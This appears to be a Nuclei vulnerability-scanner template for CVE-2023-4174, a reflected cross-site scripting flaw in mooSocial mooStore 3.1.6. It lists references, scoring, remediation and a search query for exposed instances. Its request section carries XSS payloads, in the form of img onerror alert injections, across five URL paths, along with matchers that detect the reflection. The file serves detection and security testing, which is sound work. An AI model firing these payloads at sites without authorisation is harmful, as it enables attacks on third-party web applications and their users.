59 lines
2.3 KiB
YAML
59 lines
2.3 KiB
YAML
id: CVE-2023-4174
|
|
|
|
info:
|
|
name: mooSocial 3.1.6 - Reflected Cross Site Scripting
|
|
author: momika233
|
|
severity: medium
|
|
description: |
|
|
A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.
|
|
remediation: |
|
|
Upgrade to the latest version of mooSocial or apply the vendor-provided patch to fix the XSS vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/51671
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4174
|
|
- https://packetstormsecurity.com/files/174017/Social-Commerce-3.1.6-Cross-Site-Scripting.html
|
|
- https://vuldb.com/?ctiid.236209
|
|
- https://vuldb.com/?id.236209
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-4174
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00209
|
|
epss-percentile: 0.5872
|
|
cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 5
|
|
vendor: moosocial
|
|
product: moostore
|
|
fofa-query: icon_hash="702863115"
|
|
tags: packetstorm,cve,cve2023,moosocial,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/search/index?q="><img+src=a+onerror=alert(document.domain)>ridxm'
|
|
- '{{BaseURL}}/stores"><img+src=a+onerror=alert(document.domain)>ridxm/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent'
|
|
- '{{BaseURL}}/user_info"><img+src=a+onerror=alert(document.domain)>ridxm/index/friends'
|
|
- '{{BaseURL}}/faqs"><img+src=a+onerror=alert(document.domain)>ridxm/index?content_search="><img+src=a+onerror=alert(document.domain)>ridxm'
|
|
- '{{BaseURL}}/classifieds"><img+src=a+onerror=alert(document.domain)>ridxm/search?category=1'
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<img src=a onerror=alert(document.domain)>ridxm"
|
|
- "mooSocial"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
# digest: 4b0a00483046022100cc2318543d2e06d08df70769fbe18652d72f0dd0fc8ed8876b25dfaa8f1feae00221009cb3f5e9e617481c36d1a4d17df67af2e2a7d57ee463dfc503ed358bcabb52c0:922c64590222798bb761d5b6d8e72950
|